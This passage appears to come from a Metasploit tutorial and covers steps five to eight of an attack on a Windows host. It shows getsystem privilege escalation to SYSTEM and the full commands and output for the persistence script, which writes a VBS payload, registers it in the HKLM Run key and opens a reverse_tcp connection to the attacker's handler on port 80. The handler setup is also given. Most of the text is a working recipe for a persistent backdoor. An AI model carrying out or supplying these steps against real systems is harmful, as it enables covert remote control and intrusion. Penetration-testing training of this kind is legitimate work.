Meterpreter     : x86/win32
meterpreter >

5) Escalate privilege

meterpreter > getuid
Server username: WINSETU\shabbir

meterpreter > getsystem
...got system (via technique 1).

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

6) Install backdoor on the victim machine.

meterpreter > run persistence -h
Meterpreter Script for creating a persistent backdoor on a target host.

OPTIONS:

    -A        Automatically start a matching multi/handler to connect to the agent
    -L <opt> Location in target host where to write payload to, if none %TEMP% will be used.
    -P <opt> Payload to use, default is windows/meterpreter/reverse_tcp.
    -S        Automatically start the agent on boot as a service (with SYSTEM privileges)
    -T <opt> Alternate executable template to use
    -U        Automatically start the agent when the User logs on
    -X        Automatically start the agent when the system boots
    -h        This help menu
    -i <opt> The interval in seconds between each connection attempt
    -p <opt> The port on the remote host where Metasploit is listening
    -r <opt> The IP of the system running Metasploit listening for the connect back

meterpreter > run persistence -X -i 10 -p 80 -r 192.168.1.3
[*] Running Persistance Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/WINSETU_20150625.1651/WINSETU_20150625.1651.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.1.3 LPORT=80
[*] Persistent agent script is 148439 bytes long
[+] Persistent Script written to C:\DOCUME~1\shabbir\LOCALS~1\Temp\RXdYyZmSEBJVd.vbs
[*] Executing script C:\DOCUME~1\shabbir\LOCALS~1\Temp\RXdYyZmSEBJVd.vbs
[+] Agent executed with PID 3648
[*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\YHxeQVYtYjmIYu
[+] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\YHxeQVYtYjmIYu
meterpreter >

7) Install handler for the backdoor on the Attacker machine listening on port 80.
meterpreter > background
[*] Backgrounding session 1...

msf exploit(handler) > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp

msf exploit(handler) > set LHOST 192.168.1.3
LHOST => 192.168.1.3

msf exploit(handler) > set LPORT 80
LPORT => 80

msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.1.3:80
[*] Starting the payload handler...

8) Now, whenever the victim machine boots, it will automatically connect to the Attacker machine on port 80.
[*] Sending stage (769536 bytes) to 192.168.1.2[*]
Meterpreter session 2 opened (192.168.1.3:80 -> 192.168.1.2:1051) at 2015-06-25 07:19:35 +0530

meterpreter >